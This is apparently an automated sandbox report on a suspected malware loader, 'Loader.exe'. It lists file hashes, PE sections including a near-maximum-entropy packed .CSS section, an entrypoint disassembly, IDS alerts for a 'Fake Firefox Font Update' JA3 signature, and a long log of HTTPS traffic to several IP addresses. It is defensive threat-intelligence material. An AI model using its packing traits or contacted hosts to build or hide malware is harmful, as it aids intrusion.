Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.98902954744959
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Loader.exe
File size:	373'760 bytes
MD5:	dc56d5e6f7e20eb80e375f2ff15b9b66
SHA1:	a3219c9d73f8dc4054bc705bc7191b82f202b2d9
SHA256:	ed9d9829d03cdfc38708285ad020935bec899dddb11f51754be82e6b8e2e3991
SHA512:	f8dac80a438e0891171bc0c730a28ab88ebcc18e1a689e3055a99c7d2b77a89f46d7a686f7324c168946138f4f211284e7ff04670f6e6b4120bb1209bc3d2dbc
SSDEEP:	6144:wTmnBAI3yRcyutmwCzHiW4EjELcgODUv+/fvCWkSiUZi+h1PlUKBX73u:amBdu1n4i6ODM+/pkS7h1PlUK8
TLSH:	E98423C0D4DEE356D4F5C6F5827B2AF680B8A191CB6EA39A6C01184DCFD32D91932375
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....]............"...0..............7... ...@....@.. ....................... ............`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4037b2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x9BEF5DA9 [Mon Nov 25 13:52:41 2052 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
push es
js 00007FE6E52A4ACDh
or al, 24h
add eax, 15110704h
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
pop esp
jns 00004A93h
jno 00007FE6E52A4B7Ah
aam C8h
outsd
and eax, 4C604532h
jmp far 5164h : 62FDD060h
mov dword ptr [esi], ebx
xor byte ptr [ebx+7BBFA4B8h], ah
aam 4Ah
ret
jnbe 00007FE6E52A4B36h
add al, 3Dh
add byte ptr [eax], al
add byte ptr [eax], al
jns 00007FE6E52A4B62h
lea edx, dword ptr [eax]
loope 00007FE6E52A4AFBh
sti
jne 00007FE6E52A4B13h
or esp, dword ptr [ecx]
adc esi, ebp
cmpsd
in al, 03h
mov bh, A3h
cmpsb
and dword ptr [eax], esp
test esi, esp
cwde
push edx
jmp 00007FE693578C11h
sub dword ptr [edx+325E6BADh], esp
adc dword ptr [ebx], esp
lodsd
rcl dword ptr [eax-35h], FFFFFFDCh
sub ah, byte ptr [ebx]
inc ebx
jnc 00007FE6E52A4B4Bh
jbe 00007FE6E52A4B77h
cmp dword ptr [ebp-00874B27h], esi
push eax
and ah, byte ptr [ecx+03FCEF36h]
hlt
xchg eax, edi
int3
scasb
add eax, A99A6234h
aam 6Fh
mov edx, 0A561172h
mov al, C7h
pop ds
cmp esp, ebx
fdivr qword ptr [edi]
or bl, byte ptr [ebp-5Eh]
shl al, FFFFFFBFh
mov eax, 926A3B5Eh
add byte ptr [ecx], 00000069h
pop eax
stosb

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3760	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x59c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x36cc	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1d40	0x1e00	a1775a814405ff9513e2d1c9fa557928	False	0.698828125	OpenPGP Secret Key	6.463309711390802	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x59c	0x600	b67e56d64fc312b45ef61fcc1ba948de	False	0.4095052083333333	data	4.0360481717511965	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6000	0xc	0x200	6abde47763778faaaa5b22c5212032c6	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.CSS	0x8000	0x58a00	0x58a00	53eedaf8880c7f9d6897fbebcc71ce6c	False	1.000333325987306	data	7.999489851430384	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x4090	0x30c	data			0.4217948717948718
RT_MANIFEST	0x43ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments
CompanyName
FileDescription	Externa
FileVersion	1.0.0.0
InternalName	Externa.exe
LegalCopyright	Copyright 2025
LegalTrademarks
OriginalFilename	Externa.exe
ProductName	Externa
ProductVersion	1.0.0.0
Assembly Version	1.0.0.0

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-11T01:13:23.001415+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49692	92.122.104.90	443	TCP
2025-03-11T01:13:25.964764+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49695	188.114.96.3	443	TCP
2025-03-11T01:13:48.436130+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49700	92.122.104.90	443	TCP
2025-03-11T01:13:51.114062+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49701	188.114.96.3	443	TCP
2025-03-11T01:13:54.146385+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49702	92.122.104.90	443	TCP
2025-03-11T01:13:56.837212+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49703	188.114.96.3	443	TCP
2025-03-11T01:14:00.001493+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49704	92.122.104.90	443	TCP
2025-03-11T01:14:02.863593+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49705	92.122.104.90	443	TCP
2025-03-11T01:14:05.703409+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49706	92.122.104.90	443	TCP
2025-03-11T01:14:08.518073+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49707	92.122.104.90	443	TCP
2025-03-11T01:14:11.317160+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49708	188.114.96.3	443	TCP
2025-03-11T01:14:14.347107+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49710	92.122.104.90	443	TCP
2025-03-11T01:14:17.247224+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49711	188.114.96.3	443	TCP
2025-03-11T01:14:20.907182+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49713	23.197.127.21	443	TCP
2025-03-11T01:14:23.606566+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49714	23.197.127.21	443	TCP
2025-03-11T01:14:26.337293+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49716	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 11, 2025 01:13:21.242149115 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:21.242217064 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:21.242288113 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:21.250066996 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:21.250118971 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:23.001353025 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:23.001415014 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:23.007875919 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:23.007891893 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:23.008145094 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:23.063082933 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:23.348915100 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:23.392328024 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:24.098383904 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:24.098449945 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:24.098472118 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:24.098494053 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:24.098519087 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:24.098535061 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:24.098561049 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:24.098563910 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:24.098588943 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:24.098607063 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:24.098619938 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:24.098630905 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:24.141242981 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:24.197153091 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:24.197176933 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:24.197226048 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:24.197231054 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:24.197298050 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:24.197308064 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:24.197348118 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:24.225738049 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:24.225752115 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:24.225771904 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:24.225809097 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:24.225837946 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:24.225852013 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:24.225872040 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:24.225893021 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:24.228404999 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:24.228425980 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:24.228441954 CET	49692	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:24.228447914 CET	443	49692	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:24.252948046 CET	49695	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:24.253017902 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:24.253074884 CET	49695	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:24.253659010 CET	49695	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:24.253674030 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:25.964668989 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:25.964764118 CET	49695	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:26.003936052 CET	49695	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:26.003989935 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:26.004379988 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:26.006978989 CET	49695	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:26.006978989 CET	49695	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:26.007054090 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:46.415927887 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:46.415968895 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:46.416018009 CET	49695	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:46.416029930 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:46.416991949 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:46.417017937 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:46.417054892 CET	49695	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:46.417063951 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:46.417126894 CET	49695	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:46.422724962 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:46.428517103 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:46.428565979 CET	49695	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:46.428576946 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:46.469400883 CET	49695	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:46.469413996 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:46.516314983 CET	49695	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:46.516335011 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:46.539895058 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:46.539959908 CET	49695	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:46.539968014 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:46.540199995 CET	49695	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:46.540229082 CET	49695	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:46.540381908 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:46.540416002 CET	443	49695	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:46.540429115 CET	49695	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:46.540456057 CET	49695	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:46.627785921 CET	49700	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:46.627830982 CET	443	49700	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:46.627911091 CET	49700	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:46.628254890 CET	49700	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:46.628273010 CET	443	49700	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:48.435905933 CET	443	49700	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:48.436130047 CET	49700	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:48.439739943 CET	49700	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:48.439749002 CET	443	49700	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:48.440010071 CET	443	49700	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:48.447032928 CET	49700	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:48.488325119 CET	443	49700	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:49.312581062 CET	443	49700	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:49.312616110 CET	443	49700	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:49.312635899 CET	443	49700	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:49.312721014 CET	49700	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:49.312752008 CET	443	49700	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:49.312777042 CET	49700	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:49.312807083 CET	49700	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:49.401175976 CET	443	49700	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:49.401227951 CET	443	49700	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:49.401283979 CET	49700	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:49.401312113 CET	443	49700	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:49.401367903 CET	49700	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:49.448035955 CET	443	49700	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:49.448096037 CET	443	49700	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:49.448108912 CET	443	49700	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:49.448230982 CET	49700	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:49.448276043 CET	49700	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:49.452904940 CET	49700	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:49.452920914 CET	443	49700	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:49.452944994 CET	49700	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:49.452950954 CET	443	49700	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:49.455451012 CET	49701	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:49.455493927 CET	443	49701	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:49.455576897 CET	49701	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:49.455929041 CET	49701	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:49.455938101 CET	443	49701	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:51.113912106 CET	443	49701	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:51.114062071 CET	49701	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:51.115744114 CET	49701	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:51.115756989 CET	443	49701	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:51.116070032 CET	443	49701	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:51.117389917 CET	49701	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:51.117547035 CET	49701	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:51.117572069 CET	443	49701	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:51.117636919 CET	49701	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:51.117643118 CET	443	49701	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:52.002721071 CET	443	49701	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:52.003032923 CET	443	49701	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:52.003165007 CET	49701	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:52.071046114 CET	49701	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:52.071104050 CET	443	49701	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:52.368257046 CET	49702	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:52.368319035 CET	443	49702	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:52.368377924 CET	49702	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:52.368750095 CET	49702	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:52.368762970 CET	443	49702	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:54.146291018 CET	443	49702	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:54.146384954 CET	49702	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:54.147803068 CET	49702	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:54.147814989 CET	443	49702	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:54.148610115 CET	443	49702	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:54.149873972 CET	49702	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:54.196332932 CET	443	49702	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:55.063158989 CET	443	49702	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:55.063194990 CET	443	49702	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:55.063282013 CET	443	49702	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:55.063422918 CET	49702	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:55.063455105 CET	443	49702	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:55.063494921 CET	49702	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:55.063554049 CET	49702	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:55.129441977 CET	443	49702	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:55.129517078 CET	443	49702	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:55.129645109 CET	49702	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:55.129656076 CET	443	49702	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:55.129786968 CET	49702	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:55.169964075 CET	443	49702	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:55.170083046 CET	443	49702	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:55.170099974 CET	49702	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:55.170135021 CET	443	49702	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:55.170144081 CET	49702	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:55.170150042 CET	443	49702	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:55.170213938 CET	49702	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:55.170434952 CET	49702	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:55.170458078 CET	443	49702	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:55.170469046 CET	49702	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:55.170475006 CET	443	49702	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:55.173199892 CET	49703	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:55.173247099 CET	443	49703	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:55.173324108 CET	49703	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:55.173615932 CET	49703	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:55.173628092 CET	443	49703	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:56.837104082 CET	443	49703	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:56.837212086 CET	49703	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:56.841501951 CET	49703	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:56.841535091 CET	443	49703	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:56.841850042 CET	443	49703	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:56.847958088 CET	49703	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:56.848184109 CET	49703	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:56.848218918 CET	443	49703	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:56.848273993 CET	49703	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:56.888341904 CET	443	49703	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:57.855298042 CET	443	49703	188.114.96.3	192.168.2.6
Mar 11, 2025 01:13:57.855581999 CET	49703	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:13:57.951534986 CET	49704	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:57.951595068 CET	443	49704	92.122.104.90	192.168.2.6
Mar 11, 2025 01:13:57.951669931 CET	49704	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:57.951978922 CET	49704	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:13:57.951991081 CET	443	49704	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:00.001362085 CET	443	49704	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:00.001492977 CET	49704	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:00.002788067 CET	49704	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:00.002810001 CET	443	49704	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:00.003298044 CET	443	49704	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:00.006592989 CET	49704	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:00.052326918 CET	443	49704	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:00.831814051 CET	443	49704	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:00.831849098 CET	443	49704	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:00.831872940 CET	443	49704	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:00.831906080 CET	49704	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:00.831979036 CET	443	49704	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:00.832024097 CET	49704	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:00.832046986 CET	49704	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:00.932404041 CET	443	49704	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:00.932452917 CET	443	49704	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:00.932482958 CET	443	49704	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:00.932514906 CET	49704	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:00.932552099 CET	443	49704	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:00.932584047 CET	443	49704	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:00.932584047 CET	49704	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:00.932635069 CET	49704	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:00.932801962 CET	49704	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:00.932837963 CET	443	49704	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:00.932864904 CET	49704	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:00.932879925 CET	443	49704	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:00.934698105 CET	49705	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:00.934797049 CET	443	49705	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:00.934904099 CET	49705	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:00.935177088 CET	49705	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:00.935205936 CET	443	49705	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:02.863495111 CET	443	49705	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:02.863593102 CET	49705	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:02.864999056 CET	49705	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:02.865034103 CET	443	49705	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:02.865295887 CET	443	49705	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:02.866520882 CET	49705	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:02.912319899 CET	443	49705	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:03.690422058 CET	443	49705	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:03.690515041 CET	443	49705	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:03.690557957 CET	443	49705	92.122.104.90	192.168.2.6
